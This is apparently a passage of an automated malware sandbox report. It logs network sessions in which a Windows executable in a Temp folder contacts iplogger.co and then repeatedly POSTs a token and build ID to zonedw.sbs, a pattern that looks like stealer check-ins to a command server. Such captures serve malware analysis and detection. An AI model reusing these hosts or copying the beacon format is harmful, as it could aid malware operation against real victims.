                                                                                                                                                                                                                                                2024-12-13 12:55:27 UTC1157OUTData Raw: 2d 2d 2d 2d 2d 2d 54 32 36 58 54 32 56 41 41 41 41 41 41 41 49 4d 37 47 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 37 34 65 33 31 66 31 64 33 66 31 66 33 33 34 33 62 62 66 34 35 63 65 65 62 63 61 39 37 35 36 0d 0a 2d 2d 2d 2d 2d 2d 54 32 36 58 54 32 56 41 41 41 41 41 41 41 49 4d 37 47 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 54 32 36 58 54 32 56 41 41 41 41 41 41 41 49 4d 37 47 44 42 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------T26XT2VAAAAAAAIM7GDBContent-Disposition: form-data; name="token"c74e31f1d3f1f3343bbf45ceebca9756------T26XT2VAAAAAAAIM7GDBContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------T26XT2VAAAAAAAIM7GDBCont
                                                                                                                                                                                                                                                2024-12-13 12:55:28 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:55:28 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-13 12:55:28 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                80192.168.2.450495104.21.82.934434264C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:55:28 UTC195OUTGET /1t8nM4.torrent HTTP/1.1
                                                                                                                                                                                                                                                Referer: END
                                                                                                                                                                                                                                                User-Agent: BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86
                                                                                                                                                                                                                                                Host: iplogger.co
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Cookie: 56521988137264061=3; clhf03028ja=8.46.123.189
                                                                                                                                                                                                                                                2024-12-13 12:55:29 UTC1078INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:55:29 GMT
                                                                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                memory: 0.4115447998046875
                                                                                                                                                                                                                                                expires: Fri, 13 Dec 2024 12:55:29 +0000
                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                strict-transport-security: max-age=604800
                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000
                                                                                                                                                                                                                                                content-security-policy: img-src https: data:; upgrade-insecure-requests
                                                                                                                                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                                CF-Cache-Status: BYPASS
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gMmf11HlViThXWvYQWiABrTWKhMHh2nWY6b0XOFNoU0RfdvgsGH7IkVTffqHdU17uLh8yRMXauADgoQ9%2Bd82XuiTWtiHedcwKBL3ccRNMDteJggg7UXTtRlp80NTSw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8f161bd6f841426a-EWR
                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1780&min_rtt=1723&rtt_var=762&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2822&recv_bytes=833&delivery_rate=1335773&cwnd=223&unsent_bytes=0&cid=a0f8d042618f1620&ts=540&x=0"
                                                                                                                                                                                                                                                2024-12-13 12:55:29 UTC122INData Raw: 37 34 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 0a 49 44 41 54 08 99 63 60 00 00 00 02 00 01 f4 71 64 a6 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 74PNGIHDR%VPLTEz=tRNS@fpHYs+IDATc`qdIENDB`
                                                                                                                                                                                                                                                2024-12-13 12:55:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                81192.168.2.450496116.203.10.31443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:55:29 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----IMGDJEKF37QIMYUKF3W4
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: zonedw.sbs
                                                                                                                                                                                                                                                Content-Length: 1177
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-13 12:55:29 UTC1177OUTData Raw: 2d 2d 2d 2d 2d 2d 49 4d 47 44 4a 45 4b 46 33 37 51 49 4d 59 55 4b 46 33 57 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 37 34 65 33 31 66 31 64 33 66 31 66 33 33 34 33 62 62 66 34 35 63 65 65 62 63 61 39 37 35 36 0d 0a 2d 2d 2d 2d 2d 2d 49 4d 47 44 4a 45 4b 46 33 37 51 49 4d 59 55 4b 46 33 57 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 49 4d 47 44 4a 45 4b 46 33 37 51 49 4d 59 55 4b 46 33 57 34 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------IMGDJEKF37QIMYUKF3W4Content-Disposition: form-data; name="token"c74e31f1d3f1f3343bbf45ceebca9756------IMGDJEKF37QIMYUKF3W4Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------IMGDJEKF37QIMYUKF3W4Cont
                                                                                                                                                                                                                                                2024-12-13 12:55:30 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:55:30 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-13 12:55:30 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                82192.168.2.450498116.203.10.31443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:55:30 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----6XBI5FCBIEUAIEK6PPPP
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: zonedw.sbs
                                                                                                                                                                                                                                                Content-Length: 1177
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-13 12:55:30 UTC1177OUTData Raw: 2d 2d 2d 2d 2d 2d 36 58 42 49 35 46 43 42 49 45 55 41 49 45 4b 36 50 50 50 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 37 34 65 33 31 66 31 64 33 66 31 66 33 33 34 33 62 62 66 34 35 63 65 65 62 63 61 39 37 35 36 0d 0a 2d 2d 2d 2d 2d 2d 36 58 42 49 35 46 43 42 49 45 55 41 49 45 4b 36 50 50 50 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 36 58 42 49 35 46 43 42 49 45 55 41 49 45 4b 36 50 50 50 50 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------6XBI5FCBIEUAIEK6PPPPContent-Disposition: form-data; name="token"c74e31f1d3f1f3343bbf45ceebca9756------6XBI5FCBIEUAIEK6PPPPContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------6XBI5FCBIEUAIEK6PPPPCont
                                                                                                                                                                                                                                                2024-12-13 12:55:31 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:55:31 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-13 12:55:31 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                83192.168.2.450499116.203.10.31443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:55:32 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----UASRIWTRQIEUAAA1VSRQ
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: zonedw.sbs
                                                                                                                                                                                                                                                Content-Length: 1177
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-13 12:55:32 UTC1177OUTData Raw: 2d 2d 2d 2d 2d 2d 55 41 53 52 49 57 54 52 51 49 45 55 41 41 41 31 56 53 52 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 37 34 65 33 31 66 31 64 33 66 31 66 33 33 34 33 62 62 66 34 35 63 65 65 62 63 61 39 37 35 36 0d 0a 2d 2d 2d 2d 2d 2d 55 41 53 52 49 57 54 52 51 49 45 55 41 41 41 31 56 53 52 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 55 41 53 52 49 57 54 52 51 49 45 55 41 41 41 31 56 53 52 51 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------UASRIWTRQIEUAAA1VSRQContent-Disposition: form-data; name="token"c74e31f1d3f1f3343bbf45ceebca9756------UASRIWTRQIEUAAA1VSRQContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------UASRIWTRQIEUAAA1VSRQCont
                                                                                                                                                                                                                                                2024-12-13 12:55:33 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:55:33 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-13 12:55:33 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                84192.168.2.450501116.203.10.31443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:55:33 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----EC2DB1DJMYMYM7YUS2VK
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: zonedw.sbs
                                                                                                                                                                                                                                                Content-Length: 1161
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-13 12:55:33 UTC1161OUTData Raw: 2d 2d 2d 2d 2d 2d 45 43 32 44 42 31 44 4a 4d 59 4d 59 4d 37 59 55 53 32 56 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 37 34 65 33 31 66 31 64 33 66 31 66 33 33 34 33 62 62 66 34 35 63 65 65 62 63 61 39 37 35 36 0d 0a 2d 2d 2d 2d 2d 2d 45 43 32 44 42 31 44 4a 4d 59 4d 59 4d 37 59 55 53 32 56 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 45 43 32 44 42 31 44 4a 4d 59 4d 59 4d 37 59 55 53 32 56 4b 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------EC2DB1DJMYMYM7YUS2VKContent-Disposition: form-data; name="token"c74e31f1d3f1f3343bbf45ceebca9756------EC2DB1DJMYMYM7YUS2VKContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------EC2DB1DJMYMYM7YUS2VKCont
                                                                                                                                                                                                                                                2024-12-13 12:55:34 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:55:34 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-13 12:55:34 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                85192.168.2.450502116.203.10.31443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:55:35 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----9ZUS2DTRQIE3EUS26P8G
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: zonedw.sbs
                                                                                                                                                                                                                                                Content-Length: 1177
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-13 12:55:35 UTC1177OUTData Raw: 2d 2d 2d 2d 2d 2d 39 5a 55 53 32 44 54 52 51 49 45 33 45 55 53 32 36 50 38 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 37 34 65 33 31 66 31 64 33 66 31 66 33 33 34 33 62 62 66 34 35 63 65 65 62 63 61 39 37 35 36 0d 0a 2d 2d 2d 2d 2d 2d 39 5a 55 53 32 44 54 52 51 49 45 33 45 55 53 32 36 50 38 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 39 5a 55 53 32 44 54 52 51 49 45 33 45 55 53 32 36 50 38 47 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------9ZUS2DTRQIE3EUS26P8GContent-Disposition: form-data; name="token"c74e31f1d3f1f3343bbf45ceebca9756------9ZUS2DTRQIE3EUS26P8GContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------9ZUS2DTRQIE3EUS26P8GCont
                                                                                                                                                                                                                                                2024-12-13 12:55:36 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:55:36 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-13 12:55:36 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                86192.168.2.450504116.203.10.31443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:55:36 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----N7QIMYUSJMYUAIWLN79Z
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: zonedw.sbs
                                                                                                                                                                                                                                                Content-Length: 1177
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-13 12:55:36 UTC1177OUTData Raw: 2d 2d 2d 2d 2d 2d 4e 37 51 49 4d 59 55 53 4a 4d 59 55 41 49 57 4c 4e 37 39 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 37 34 65 33 31 66 31 64 33 66 31 66 33 33 34 33 62 62 66 34 35 63 65 65 62 63 61 39 37 35 36 0d 0a 2d 2d 2d 2d 2d 2d 4e 37 51 49 4d 59 55 53 4a 4d 59 55 41 49 57 4c 4e 37 39 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 4e 37 51 49 4d 59 55 53 4a 4d 59 55 41 49 57 4c 4e 37 39 5a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------N7QIMYUSJMYUAIWLN79ZContent-Disposition: form-data; name="token"c74e31f1d3f1f3343bbf45ceebca9756------N7QIMYUSJMYUAIWLN79ZContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------N7QIMYUSJMYUAIWLN79ZCont
                                                                                                                                                                                                                                                2024-12-13 12:55:37 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:55:37 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-13 12:55:37 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                87192.168.2.450506116.203.10.31443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:55:38 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----0HLX4E3W4EU3E3ECTJMG
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: zonedw.sbs
                                                                                                                                                                                                                                                Content-Length: 1177
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-13 12:55:38 UTC1177OUTData Raw: 2d 2d 2d 2d 2d 2d 30 48 4c 58 34 45 33 57 34 45 55 33 45 33 45 43 54 4a 4d 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 37 34 65 33 31 66 31 64 33 66 31 66 33 33 34 33 62 62 66 34 35 63 65 65 62 63 61 39 37 35 36 0d 0a 2d 2d 2d 2d 2d 2d 30 48 4c 58 34 45 33 57 34 45 55 33 45 33 45 43 54 4a 4d 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 30 48 4c 58 34 45 33 57 34 45 55 33 45 33 45 43 54 4a 4d 47 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------0HLX4E3W4EU3E3ECTJMGContent-Disposition: form-data; name="token"c74e31f1d3f1f3343bbf45ceebca9756------0HLX4E3W4EU3E3ECTJMGContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------0HLX4E3W4EU3E3ECTJMGCont
                                                                                                                                                                                                                                                2024-12-13 12:55:39 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:55:39 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-13 12:55:39 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                88192.168.2.450507116.203.10.31443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:55:39 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----2NY5P8Q9RQIMYUSJEU3W
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: zonedw.sbs
                                                                                                                                                                                                                                                Content-Length: 1157
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-13 12:55:39 UTC1157OUTData Raw: 2d 2d 2d 2d 2d 2d 32 4e 59 35 50 38 51 39 52 51 49 4d 59 55 53 4a 45 55 33 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 37 34 65 33 31 66 31 64 33 66 31 66 33 33 34 33 62 62 66 34 35 63 65 65 62 63 61 39 37 35 36 0d 0a 2d 2d 2d 2d 2d 2d 32 4e 59 35 50 38 51 39 52 51 49 4d 59 55 53 4a 45 55 33 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 32 4e 59 35 50 38 51 39 52 51 49 4d 59 55 53 4a 45 55 33 57 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------2NY5P8Q9RQIMYUSJEU3WContent-Disposition: form-data; name="token"c74e31f1d3f1f3343bbf45ceebca9756------2NY5P8Q9RQIMYUSJEU3WContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------2NY5P8Q9RQIMYUSJEU3WCont
                                                                                                                                                                                                                                                2024-12-13 12:55:40 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:55:40 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-13 12:55:40 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 2ok0


